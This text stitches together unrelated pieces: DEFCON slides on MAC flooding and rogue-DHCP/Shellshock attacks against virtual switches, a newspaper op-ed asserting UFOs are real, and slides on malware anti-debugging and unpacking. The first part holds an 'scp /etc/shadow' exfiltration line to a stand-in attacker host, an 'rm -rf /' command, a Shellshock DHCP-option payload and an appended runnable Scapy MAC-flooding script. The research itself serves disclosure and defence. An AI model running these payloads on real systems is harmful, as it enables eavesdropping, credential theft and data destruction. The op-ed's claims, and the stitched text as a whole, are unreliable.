of Service – Gain unauthorized access to restricted sub-networks – Affect performance Quick Review of Network Basics © 2015 Ronny L. Bull - Clarkson University Bridging © 2015 Ronny L. Bull - Clarkson University ● Physical bridges connect two or more segments at Layer 2 – Separate collision domains – Maintain MAC address forwarding table for each segment – Forward requests based upon destination MAC addresses ● Do not cross bridge if destination is on same segment as source ● Cross if destination is on a different segment connected to the bridge Ethernet Frame © 2015 Ronny L. Bull - Clarkson University Preamble 8 Dest. Address 6 Source Address 6 Type / Length 2 Data ~ FCS 4 Preamble 8 Dest. Address 6 Used for Layer 2 Forwarding Bridging © 2015 Ronny L. Bull - Clarkson University Virtual Bridges © 2015 Ronny L. Bull - Clarkson University ● Simplest form of virtual networking ● Uses 802.1d Ethernet Bridging – Support built into Linux kernel and bridge-utils user-space package – Uses virtual TAP interfaces to connect virtual machines to virtual bridge (ie. 
tap0) ● User-space “Network Tap” ● Simulates a Layer 2 (link layer) network device Switching © 2015 Ronny L. Bull - Clarkson University ● Physical switches operate at Layer 2 or higher ● Multi-port bridges – Separate collision domains ● CAM Table – Content Addressable Memory – Similar to bridge forwarding table – Dynamic table that maps MAC addresses to ports – Allows switches to intelligently send traffic to connected devices – Check frame header for destination MAC and forward – Finite amount of memory! Switching © 2015 Ronny L. Bull - Clarkson University Example of switch's CAM table Mapping dest address to port Virtual Switches © 2015 Ronny L. Bull - Clarkson University ● Advanced form of virtual networking ● Can emulate Layer 2 and higher physical devices ● Virtual machines connect to vSwitch via virtual interfaces (ie. vif0) – Similar to tap devices ● Able to provide services such as – QoS – VLAN traffic separation – Performance & traffic monitoring Virtual Switches © 2015 Ronny L. Bull - Clarkson University ● Variety of virtual switches available – Typically bound to certain environments – Open vSwitch ● OS Xen, Citrix XenServer, KVM, Prox-Mox – Cisco Nexus 1000V Series ● VMWare vSphere, MS Hyper-V (add-on) – MS Hyper-V Virtual Switch ● Microsoft Hyper-V ● All are considered as enterprise level solutions Overview of Results ● MAC Flooding Attack ● Attack Overview ● Summary of Results ● DHCP Attack Scenarios ● Scenario Descriptions ● Summary of Results © 2015 Ronny L. Bull - Clarkson University Test Environment A.K.A. Cloud Security Research Lab © 2015 Ronny L. Bull - Clarkson University Hardware Specs © 2015 Ronny L. Bull - Clarkson University (full system specs are provided in the white paper on the DEFCON 23 CD) MAC Flooding Attack © 2015 Ronny L. Bull - Clarkson University MAC Flooding © 2015 Ronny L. Bull - Clarkson University ● MAC Flooding – Flood switch with numerous random MAC addresses to fill the CAM table buffer – Forces switch into fail safe mode (a.k.a. Hub mode) – All frames forwarded to all connected devices ● Breaks collision domain separation – Works well on most physical switches MAC Flooding © 2015 Ronny L. Bull - Clarkson University MAC Flooding Demo Network Diagram © 2015 Ronny L. Bull - Clarkson University MAC Flooding Demos © 2015 Ronny L. Bull - Clarkson University ● Demos – Gentoo / OS Xen – 802.1d Linux Bridging ● https://www.youtube.com/watch?v=Zh-aOy9gu9I – Gentoo / OS Xen – Open vSwitch 2.0.0 ● https://www.youtube.com/watch?v=gzuQI_XUgKc – Citrix XenServer 6.2 – Open vSwitch 1.4.6 ● https://www.youtube.com/watch?v=Y1JQg5YXfY4 MAC Flooding Summary © 2015 Ronny L. Bull - Clarkson University MAC Flooding (Performance Degradation) © 2015 Ronny L. Bull - Clarkson University MAC Flooding ● Reported Open vSwitch vulnerability to: ● cert.org ● Assigned VU#784996 ● cve-assign@mitre.org ● No response as of yet ● security@openvswitch.org ● Responded with implementation of MAC learning fairness patch ● Applied to all versions of Open vSwitch >= 2.0.0 ● https://github.com/openvswitch/ovs/commit/2577b9346b9b77feb94b34398b54b8f19fcff4bd © 2015 Ronny L. Bull - Clarkson University MAC Flooding Mitigation © 2015 Ronny L. 
Bull - Clarkson University ● Can be mitigated by enforcing port security on physical switches – Feature only currently available on Cisco Nexus 1000V 'Non-Free' version (VMWare Essentials Plus & MS Hyper-V) – Limit amount of MAC addresses that can be learned via a single port ● Only allow authorized MAC addresses to connect to a single port on the switch – Trusted connections, no malicious intent ● Disable unused switch ports DHCP Attacks © 2015 Ronny L. Bull - Clarkson University DHCP Protocol © 2015 Ronny L. Bull - Clarkson University ● Networking protocol used on most computer networks to automate the management of IP address allocation ● Also provides other information about the network to clients such as: – Subnet Mask – Default Gateway – DNS Servers – WINS Servers – TFTP Servers DHCP Protocol Client – Server Model © 2015 Ronny L. Bull - Clarkson University DHCP Options © 2015 Ronny L. Bull - Clarkson University ● DHCP allows an administrator to pass many options to a client besides the standard Subnet Mask, DNS, and Default Gateway information ● Options are specified by a DHCP Option Code number – Option 4 – Time Server – Option 15 – Domain Name – Option 35 – ARP Cache Timeout – Option 69 – SMTP Server ● Options are defined in RFC 2132 - DHCP Options – https://tools.ietf.org/html/rfc2132 DHCP Attacks © 2015 Ronny L. Bull - Clarkson University ● DHCP Attacks – Rogue DHCP server is placed on a network – Competes with legitimate DHCP server when responding to client addressing requests – 50/50 chance that a client will associate with malicious server since client requests are broadcast to the network ● Multiple rogue DHCP servers will reduce the odds! – Setting up a DHCP server on an existing system is very simple and can be completed in a matter of minutes DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University ● Condition: – Two DHCP servers provide addresses to clients on the same network within the same range ● ie. 10.1.2.100 – 10.1.2.200 – High probability that duplicate addressing will occur ● First address allocated from each DHCP server will most likely be: 10.1.2.100 ● Then 10.1.2.101 … 102 … 103 ... etc ... DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University ● Affect: – Denial of Service for the two clients that received the same address ● In conflict ● Services provided by those clients become inaccessible to other systems on the same network ● Client is unable to access resources on the network due to the conflict DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Rogue DNS Server © 2015 Ronny L. Bull - Clarkson University ● Condition: – A malicious DHCP server provides associated clients with the IP address of a poisoned DNS server – Poisoned DNS server is seeded with information that directs clients to spoofed websites or services ● Affect: – Client system is directed to malicious services that are intended to steal information or plant viruses, worms, maleware, or trojans on the system – PII or other sensitive information is harvested by the attacker DHCP Attacks Rogue DNS Server © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Incorrect Default Gateway © 2015 Ronny L. 
Bull - Clarkson University ● Condition: – A malicious DCHP server provides the IP address of an incorrect default gateway for associated clients ● Affect: – Clients are unable to route traffic outside of their broadcast domain – Unable to access other resources on subnets or the Internet DHCP Attacks Malicious Honeynet © 2015 Ronny L. Bull - Clarkson University ● Condition: – A malicious DCHP server provides the IP address of an malicious default gateway for associated clients ● Affect: – Client traffic is routed to a malicious honeynet that the attacker setup in order to harvest PII or other sensitive information DHCP Attacks Malicious Honeynet © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University ● Condition: – By making use of certain DHCP options clients can be forced to run code or other commands while acquiring a DHCP lease ● Each time the lease is renewed the code will be executed, not just the initial time! – The BASH vulnerability ShellShock can be leveraged to remotely execute commands or run code on a vulnerable Linux or Mac OSX system DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University ● Affect: – Remote commands or code executed on associated system with root privileges! ● Intent could be harmless to catastrophic: – Set the system banner: ● echo “Welcome to $HOSTNAME” > /etc/motd – Send the shadow file somewhere: ● scp /etc/shadow attacker@badguy.net:. – Delete all files and folders on the system recursively from / ● rm -rf / DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University DHCP Attack Test Environment © 2015 Ronny L. Bull - Clarkson University ● The same test environment was used as in the previous MAC flooding experiment DHCP Attack Virtual Machines © 2015 Ronny L. Bull - Clarkson University ● However four new virtual machines were created in each platform to setup scenarios DHCP Attack Scenarios © 2015 Ronny L. Bull - Clarkson University ● Remote Execute of Code – The following command was passed with DHCP option 100: dhcp-option-force=100,() { :; }; /bin/echo 'Testing shellshock vulnerability. If you can read this it worked!'>/tmp/shellshock – The 'id' command was also passed to verify root privileges ● Poisoned DNS Server – The DHCP server was also configured as the poisoned DNS server directing clients to a malicious web server spoofing gmail.com, mail.google.com, and www.gmail.com DHCP Attack Scenarios © 2015 Ronny L. Bull - Clarkson University ● Invalid Default Gateway – Clients were passed a default gateway address of 1.1.1.1 instead of the valid 192.168.1.1 ● Malicious Default Gateway – Clients were passed a default gateway address of 192.168.1.20 which was a system configured as a simple router routing traffic to a malicious honeynet containing a web server Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University 192.168.1.2 = Legitimate DHCP Server 192.168.1.3 = Rogue DHCP Server Legit Rogue Legit Rogue Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University Shellshock ID Command Test © 2015 Ronny L. Bull - Clarkson University /etc/dnsmasq.conf entry on server: Output of dhclient on client: DHCP Attack Summary © 2015 Ronny L. Bull - Clarkson University DHCP Attack Demos © 2015 Ronny L. 
Bull - Clarkson University ● Poisoned DNS server – https://www.youtube.com/watch?v=XIH51udAZt0 ● Initial Shellshock test (write file to /tmp) – https://www.youtube.com/watch?v=K3ft-tt0N3M ● Shellshock exploit (full root access) – https://www.youtube.com/watch?v=ZdL_6XF1w3o DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● DHCP attacks can be mitigated by the following: ● Enforcing static IP addressing, DNS entries, and default gateways on every device – Cumbersome! – Prone to error ● Utilized DHCP snooping on switches – Option on some physical switches (Cisco, HP) – Restrict network access to specific MAC addresses connected to specific switch ports ● Highly restrictive! ● Prevents unauthorized DHCP servers DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● Use DHCP server authorization – Windows 2000 server and up – Feature of Active Directory and Windows DHCP servers ● Techniques using software defined networking (SDN) could be explored – Define filters to identify DHCP client requests on the broadcast domain and forward them to the correct server DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● SELinux Enabled (Default in CentOS & RedHat) – Seemed to have no affect on the majority of the attacks – Shellshock DHCP attack ● When enabled it did prevent us from writing to any directory that did not have 777 permissions. – Could write to /tmp & /var/tmp – Could not write to /root, /, /etc/, /home/xxx ● When disabled we could use the attack to write files anywhere on the system as the root user Looking Ahead VLAN Hopping Attacks © 2015 Ronny L. Bull - Clarkson University Next Step ● Next step: evaluate VLAN security in virtualized environments: ● All virtual switch products support the creation of VLANs ● VLANs allow service providers to logically separate and isolate multi-tenant virtual networks within their environments ● Do the current known vulnerabilities in commonly used VLAN protocols apply to virtualized networks? ● Could allow for: ● Eavesdropping of traffic on restricted VLANs ● Injection of packets onto a restricted VLAN ● DoS attacks ● Covert channels © 2015 Ronny L. Bull - Clarkson University Conclusion ● All Layer 2 vulnerabilities discussed were targeted towards the virtual networking devices not the hypervisors themselves ● Results show that virtual networking devices CAN be just as vulnerable as their physical counterparts ● Further research and experimentation is necessary to find out more similarities ● XenServer and any other solutions utilizing Open vSwitch are vulnerable to eavesdropping out of the box! ● All environments are vulnerable to manipulation via the DHCP protocol out of the box! © 2015 Ronny L. Bull - Clarkson University Conclusion © 2015 Ronny L. Bull - Clarkson University ● A single malicious virtual machine has the potential to sniff all traffic passing over a virtual switch – This can pass through the virtual switch and affect physically connected devices allowing traffic from other parts of the network to be sniffed as well! ● Significant threat to the confidentiality, integrity, and availability (CIA) of data passing over a network in a virtualized muli-tenant environment ● The results of the research presented today provide proof that a full assessment of Layer 2 network security in multi- tenant virtualized network environments is warranted Take-Away Actions © 2015 Ronny L. 
Bull - Clarkson University ● Users become empowered by understanding which virtual switch implementations are vulnerable to different Layer 2 network attacks – Educated users will question providers about their hosting environment – Audit the risk of workloads they run in the cloud or within multi-tenant virtualized environments – Consider extra security measures ● Increased use of encryption ● Service monitoring ● Threat detection and Alerting © 2015 Ronny L. Bull - Clarkson University ● Email: – bullrl@clarkson.edu – jnm@clarkson.edu ● The white paper and narrated video demos are available on the DEFCON 23 CD ● Special thanks to Nick Merante for helping to acquire the equipment needed to perform this research
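For reference, the MAC flooding attack demonstrated above reduces to a few lines of Scapy; the sketch below is functionally what tools such as macof do. The interface name is a placeholder, and this should only ever be pointed at lab switches (physical or virtual) that you own.

from scapy.all import Ether, IP, UDP, RandMAC, RandIP, sendp

IFACE = "eth0"   # placeholder: interface facing the switch under test

def mac_flood(count=50000):
    """Fill the switch's CAM/MAC table with bogus source addresses."""
    for _ in range(count):
        frame = (Ether(src=RandMAC(), dst=RandMAC()) /
                 IP(src=RandIP(), dst=RandIP()) /
                 UDP(sport=12345, dport=12345))
        # Once the table is exhausted, many switches fail open and start
        # flooding every frame out of every port, which is what makes the
        # eavesdropping shown in the demos possible.
        sendp(frame, iface=IFACE, verbose=False)

if __name__ == "__main__":
    mac_flood()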
After 35 years of serious investigation, exploration, and reflection, engaged with the best researchers in the field, it was time to make as succinct and clear a statement as I could, within the constraints of 1200 words for the Crossroads section in the Sunday Milwaukee Journal Sentinel. It was also a way for a mainstream newspaper, the winner of many awards, to implicitly suggest that the subject is more than tabloid fodder. http://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos-b99203753z1- 245623181.htmlhttp://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos- b99203753z1-245623181.html A Confession: Out of the Closet on UFOs - February 16 2014 Let me put it to you straight. For 35 years I have been exploring and investigating UFOs and UFOlogy (both the serious endeavor and the silly speculative fare that fills popular culture) and ... well, UFOs are real: They fly, they evince technologies we don’t understand, and they have been around for years. Above all, despite voluminous and overwhelming evidence to support those assertions, to raise this subject as worthy of historical and scientific investigation is to invite ridicule, the shaking of pitying heads, derision and hostility, and embarrassed silence. Still, I persist in believing, as Francis Bacon said in 1620, that if something deserves to exist, it deserves to be known, not rejected out of hand with prejudice. The scientific method, principles of historical analysis, and an open mind ask that much. No subject has been more marginalized and maligned than this topic. By “unidentified flying objects” I mean not the many things commonly mistaken for them – balloons, Venus, sprites, ball lightning, secret craft, etc.– I mean anomalous vehicles which for decades have been well documented by credible observers (“Credible people have seen incredible things,” said General John Samford, US Air Force Chief of Intelligence, in 1953), to which our government responded with the formulation and execution of policies in light of genuine national security concerns. I was recently privileged to be included as contributing editor and writer on a team that produced the book, “UFOs and Government: A Historical Inquiry” over five years. The research/writing team was led by Dr. Michael Swords, a professor of Natural Science (ret.) at Western Michigan University and Robert Powell, a nanotechnologist formerly with AMD. The book is regarded as an “exception” to the dreary field by CHOICE, the journal that recommends works for inclusion in university collections. CHOICE suggested that all university libraries should have it (to date, 45 have it in their collections, including 4 in the U-Wisconsin system, as well as many Wisconsin public libraries). The almost-600 page book is well grounded with nearly 1000 citations from government documents and other primary sources so it is “bullet proof.” There is virtually nothing speculative in it. We document the response of governments from the 1940s forward to events they took quite seriously—and which readers, judging on the evidence and data, will take seriously as well. A short column can not do justice to the complex narrative, but I can state a few facts. (1) Any other domain of inquiry with hundreds of well-documented events would be considered worthy of scientific and historical investigation. (2) Well-executed policies carried out with secrecy do not constitute “a conspiracy,” and we are not “conspiracy theorists,” a term used to denigrate investigators of unpopular subjects. 
Members of the military and intelligence community, from the early 1950s on, decided to learn as much as they could about UFOs – which they decided did not constitute a direct threat to national security – while at the same time playing down and dismissing reports from the public. The reports themselves were considered to be the primary threat by the CIA. (3) The data illuminates phenomena that is global, persistent, and sufficiently similar in small details to invite taxonomic classification as to vehicle types, the physics of force fields which power the objects and ionize the air around it, producing characteristic colors in relationship to speed and power, and diverse kinds of robotic or sentient beings associated with the objects. (4) It is an astonishing sociological and psychological event that throughout the twentieth century, reports by credible observers, corroborated on multiple radar sets on the ground and in jets, resulted not in public investigation but in an inability to get our minds around the mere possibility. Instead the subject is literally “unthinkable.” (5) One reason it is“unthinkable” is the effective use of ridicule, the mocking of people who made reports or took the subject seriously, and a long silence from official authoritative voices in the face of credible testimony. When I delivered a speech and served on a panel recently at the NSA, I was reminded by a veteran analyst that “the three legs of cover and deception are illusion, misdirection, and ridicule. But the greatest of these is ridicule”—which discredits the person, not the testimony, and the testimony I have heard has come from military and civilian pilots, astronauts, even the intelligence head of a foreign military force. “This is what I saw, and I know what I saw” is what I am told, corroborating the statement in 1947 by Lt. Gen. Nathan Twining that “The phenomena is something real and not visionary or fictitious.” (6) My personal exploration began in 1978 when, as a recently ordained Episcopal clergyman in a parish on the edge of an Air Force base, a parishioner, a decorated fighter pilot with all the “right stuff” who retired as a Colonel, told me, “We chase them and we can’t catch them.” (7) “UFOs and Government” includes quotations from generals, senior intelligence personnel, and professionals like Hermann Oberth, the father of German rocketry, that affirm the exotic characteristics of the technology that no earthly power could then achieve. As Apollo 14 astronaut Edgar Mitchell told me, “Richard, if we could do what they can do, they wouldn’t have sent me to the moon in a tin lizzie.” (8) We increasingly accept through our own scientific explorations that many earth- like planets likely to harbor life fill our galaxy and galaxies beyond. When we hear that from authoritative voices, we accept it as a probability, but when we examine the evidence of decades of visitation by real explorers, we find it difficult to think in a concrete way that we are not alone, not the top of the food chain, and that others may have been voyaging for thousands of years—as if we are the gold standard of scientific knowledge and our current understanding of physics is the end of all physics. So I’m out of the closet on a subject. 
As an older man with a solid track record of delivering insights into likely futures that have pretty much worked out over the years, a man who has spoken for security conferences all over the world (including NSA, the FBI, the Secret Service, the US Department of the Treasury, the Pentagon, etc.), discussing the impact of new technologies, I can say without embarrassment that documented data supports the contention that many historical reports show exactly what they seem to show –anomalous vehicular traffic demonstrating aerodynamic capabilities and propulsion systems beyond the range of our own technology. So ... why do well-intentioned people who know more than I do persist in the pretense that nothing unusual has been going on? That’s a more speculative exploration, one for another time. Richard Thieme is a Fox Point writer and professional speaker (www.thiemeworks.com). In addition to “UFOs and Government: A Historical Inquiry,” he has written “Islands in the Clickstream (2004)” and “Mind Games (2010)” and contributed chapters to several books.
Covert Debugging Circumventing Software Armoring Techniques Offensive Computing, LLC Danny Quist Valsmith dquist@offensivecomputing.net valsmith@offensivecomputing.net Offensive Computing - Malware Intelligence Danny Quist • Offensive Computing, Cofounder • PhD Student at New Mexico Tech • Reverse Engineer • Exploit Development • cDc/NSF Offensive Computing - Malware Intelligence Valsmith • Offensive Computing, Cofounder • Malware Analyst/Reverse Engineer • Metasploit Contributor • Penetration Tester/Exploit developer • cDc/NSF Offensive Computing - Malware Intelligence Offensive Computing, LLC • Community Contributions – Free access to malware samples – Largest open malware site on the Internet – 350k hits per month • Business Services – Customized malware analysis – Large malware data-mining / access – Reverse Engineering Offensive Computing - Malware Intelligence Introduction • Debugging Malware is a powerful tool – Trace Runtime Performance – Monitor API Calls – Dynamic Analysis == Automation • Malware is getting good at preventing it – Debugger Detection – VM Detection – Legitimate Software Pioneered these Techniques Offensive Computing - Malware Intelligence Overview of Talk • Software Armoring Techniques • Covert Debugging Requirements • Dynamic Instrumentation for Debugging • OS Pagefault Assisted Covert Debugging • Application – Generic Autounpacking • Results Offensive Computing - Malware Intelligence Software Armoring • Packing/Encryption • VM Detection • SEH Tricks • Debugger Detection • Shifting Decode Frame • Example: Microsoft’s Patchguard Offensive Computing - Malware Intelligence Packing/Encryption • Self-modifying Code – Small Decoder Stub – Decompresses the main executable – Restores imports • Play Tricks with Portable Executables – Hide the Imports – Obscure relocations – Encrypt/compress the executable Offensive Computing - Malware Intelligence Normal PE File Offensive Computing - Malware Intelligence Packed PE File Offensive Computing - Malware Intelligence Virtual Machine Detection • Single instruction detection – SLDT, SGDT, SIDT – See: Redpill, Scoopy-Doo, OCVmdetect • Instructions for Privileged/Unprivileged CPU mode – VMs try to be efficient, some instructions insecure – Do not fully emulate x86 bug for bug Offensive Computing - Malware Intelligence Debugger Detection • Windows API – IsDebuggerPresent() API call – Checks PEB for magic bit (EFLAGS) – Bit toggling works • Timing Attacks – Issue RDTSC instruction, compare to known values – Amazingly effective Offensive Computing - Malware Intelligence Debugger Detection (cont.) • Breakpoint Detection – Int3 (0xCC) Instruction Scanning – Checksumming of executable • Hardware Debugging Detection – Check CPU Flags for debug bit • SoftICE Detection – Modification of Int3 Scanning Offensive Computing - Malware Intelligence SEH Tricks • Structured Exception Handler • Used to handle error in running code • Malware will overload this function to unpack code • Debugger thinks SEH exceptions are for it • Debugger dies Offensive Computing - Malware Intelligence Shifting Decode Frames • Execution is split at the basic block level • Block is decoded, executed, and then encoded again • Hard to defeat! • Implemented in Patchguard for Vista 64 and Windows Server 2003 64-bit Offensive Computing - Malware Intelligence So What? 
• These are all variations on a theme • There should be a generic way to debug • Need to modify at a fundamental level • Solution should be: – Generic – Work across set of executables – Efficient – Good performance for non-debug – Undetectable (as much as possible) – Extensible – Automation is the key Offensive Computing - Malware Intelligence Software Armoring Achilles Heel If it executes, it can be unpacked. [http://www.security-assessment.com/files/presentations/Ruxcon_2006_-_Unpacking_Virus,_Trojans_and_Worms.pdf] Offensive Computing - Malware Intelligence Unpacking • How an Unpacker Works: – Writes to an area of memory (decode) – Memory is read from (execute) – More writes to memory (optional re-encoding) • CPU Only Executes Machine Code • This process can be monitored • Unpacking is directly related to timing – At some point, it must be unpacked Offensive Computing - Malware Intelligence Manual Unpacking Process • Consists of several stages – Identify Packer Type – Find OEP or get process to unpacked state in memory – Dump process memory to file – Fixup file / rebuild Import Address Table (IAT) – Ensure file can now be analyzed Offensive Computing - Malware Intelligence Manual Unpacking Process • Several methods to identify packer type – Peid – Msfpecan / OffensiveComputing.net – Manually look at section names – Other packer scanners like • Protection-id • Pe-scan Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process • Methods to find OEP / unpacked memory – OllyScripts • http://www.tuts4you.com • http://www.openrce.org – OEP finder tools • OEP finders for specific packers • OEP Finder (very limited) • PE Tools / LordPe • PEiD generic OEP finder Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process – Dump process memory to file • OllyDump • LordPE • Custom tools – Example: void DumpProcMem(unsigned int ImageBase, unsigned int ImageSize,LPSTR filename, LPSTR pid) { SIZE_T ReadBytes = 0; SIZE_T WriteBytes = 0; unsigned char * buffer = (unsigned char *) calloc(ImageSize, 1); HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, (DWORD)atoi(pid)); ReadProcessMemory(hProcess, (LPCVOID) ImageBase, buffer, ImageSize, &ReadBytes); HANDLE hFile = CreateFile(TEXT("oc_dumped_image.exe"), GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WriteFile(hFile, buffer, ImageSize, &WriteBytes, NULL); Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process – Fixup file / rebuild Import Address Table (IAT) • ImportRec probably best tool • Revirgin by +Tsehp • Manually with a hex editor (tedious) – IAT contains list of functions imported • Very useful for understanding capabilities Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process • Ensure file can now be analyzed • Clean disassembly should be available • IAT should be visible • Functions should be found • Strings clear and useful • Manual unpacking process can be tedious • Hardest part is generally finding the OEP Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Unpacking: The Algorithm • Track written memory • If that memory is executed, it’s unpacked • Must monitor: – Memory writes – Memory Executions • Break on execute useful here • 
Automate the process Offensive Computing - Malware Intelligence Dynamic Instrumentation • Allows a running process to be monitored • Intel PIN – Uses Just-In-Time compiler to insert analysis code – Retains consistency of executable – Pintools – Use API to analyze code – Good control of execution • Instruction • Memory access • Basic block – Process Attaching / Detaching Offensive Computing - Malware Intelligence Dynamic Instrumentation • Instruction tracing for the following packers – Armadillo – Aspack – FSG – MEW – PECompact – Telock – UPX • Created Simple Hello World Application • Graphed results with Oreas GDE Offensive Computing - Malware Intelligence Results Aspack 2.12 Offensive Computing - Malware Intelligence Results • Unpacking loop is easy to find Offensive Computing - Malware Intelligence Dynamic Instrumentation Results • Generic Algorithm Described Previously works well • All address verified by manual unpacking • Addresses display clustering, which must be taken into account • Attach / Detach is effective for taking memory snapshots of an executable Offensive Computing - Malware Intelligence Dynamic Instrumentation Problems • Detectable – Memory checksums – Signature scanning • Extend this to work generically, non- detectably • Slow – ~1,000 times slower than native • Need faster implementation Offensive Computing - Malware Intelligence Towards a Solution • Core operating system component that: – Monitors all memory – Intercepts memory accesses – Fast Interception and Logging – Fundamental part of OS Offensive Computing - Malware Intelligence Introducing Saffron • Intel PIN and Hybrid Page Fault Handler • Extension of OllyBonE Kernel Code • Designed for 32-bit Intel x86 CPUs • Replaces Windows 0x0E Trap Handler • Logs memory accesses Offensive Computing - Malware Intelligence Offensive Computing - Malware Intelligence Virtual Memory Translation • Each process has its own memory • Memory must be translate from Virtual to Physical Address • Non-PAE 32bit Processors use 2 page indexes and a byte index • Each process has its own Page Directory Offensive Computing - Malware Intelligence Example Memory Translation Virtual Address 0 (LSB) 31 [Microsoft Windows Internals, Fourth Edition, Microsoft Press] CPU References Virtual Memory Address Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN CR3 Page Directories (Contains the PDE) [Microsoft Windows Internals, Fourth Edition, Microsoft Press] CR3 contains process Page Directories Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN PTE CR3 Page Directories (Contains the PDE) Page Tables (Contains the PTE) [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN PTE Address CR3 Desired Page Desired Byte Page Directories (Contains the PDE) Page Tables (Contains the PTE) Physical Address Space [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - 
Malware Intelligence MMU Data Structures • Page Directory Entry is hardware defined – Contains permissions, present bit, etc. • Page Table Entry also hardware defined – Permissions (Ring0 vs. all others) – Present bit (paged to disk or not) – “User” defined bits (for OS) Offensive Computing - Malware Intelligence Virtual Address Translation • TLB is major source of optimization • Hardware resolves as much as possible • Invokes page fault handler when – Page is not loaded in RAM – Incorrect privileges – Loaded, but mapped with demand paging – Address is not legal (out-of-range) • All indicated by special fields Offensive Computing - Malware Intelligence Intel TLB Implementation • Two TLBs maintained – Data - DTLB – Instructions – ITLB • ITLB more optimized than DTLB – Less lookups for ITLB == faster code – DTLB accessed less Offensive Computing - Malware Intelligence Offensive Computing - Malware Intelligence Process Monitoring • Overloading of supervisor bit in page fault handler • All process memory must be found • Iterate through all pages for a process – Windows application memory 0x00000000 – 0x7FFFFFFF • Mark supervisor bit on each valid PTE • Invalidate the page in the TLB with INVLPG • Hook heap allocation so new pages are watched Offensive Computing - Malware Intelligence Trap to Page Fault Handler • Determine if a watched process • Unset the supervisor bit • Loads the memory into the TLB • Resets supervisor bit Offensive Computing - Malware Intelligence Results • Memory accesses are visible • Reads, writes, and executes are exposed • Program execution can be tracked, controlled • Memory reads, writes are extremely apparent • Executions only show for each individual page Offensive Computing - Malware Intelligence Modifying the Autounpacker • Watch for written pages • Monitor for executions into that page • Mark page as Original Entry Point • Dump memory of the process Offensive Computing - Malware Intelligence Video Demo of Unpacking • Demonstrate Saffron Offensive Computing - Malware Intelligence Autounpacker Results • Effective method for bypassing debugger attacks – SEH decode problem is easily solved – Memory checksum • No process memory is modified • p0wn3d!!! • Shifting decode frame – Slight modification under development, but effective Offensive Computing - Malware Intelligence Future Work • Develop full-fledged API • Problems – Sometimes all page markings are lost – Still detectable at some level Offensive Computing - Malware Intelligence Questions? • Paper, presentation available at www.offensivecomputing.net
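To make the write-then-execute heuristic from the "Unpacking: The Algorithm" slides concrete, here is a minimal, instrumentation-agnostic sketch of the bookkeeping. It assumes you already have a source of per-address write and execute events (PIN callbacks, a page-fault hook such as Saffron, or a recorded trace); it is not the Saffron implementation itself.

PAGE_SIZE = 0x1000

class UnpackTracker:
    """Track written pages; execution from such a page means unpacked code."""

    def __init__(self):
        self.dirty_pages = set()      # pages written since tracking started
        self.oep_candidates = []      # (page, address) where written memory ran

    def on_write(self, address):
        self.dirty_pages.add(address & ~(PAGE_SIZE - 1))

    def on_execute(self, address):
        page = address & ~(PAGE_SIZE - 1)
        if page in self.dirty_pages:
            # First execution out of a previously written page: a good moment
            # to dump process memory and treat this as an OEP candidate.
            self.oep_candidates.append((page, address))
            self.dirty_pages.discard(page)   # report each page only once

# Toy event trace: two writes into a page, then a jump into it.
if __name__ == "__main__":
    t = UnpackTracker()
    for kind, addr in [("w", 0x401000), ("w", 0x401123), ("x", 0x401050)]:
        t.on_write(addr) if kind == "w" else t.on_execute(addr)
    print("OEP candidates:", [hex(a) for _, a in t.oep_candidates])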
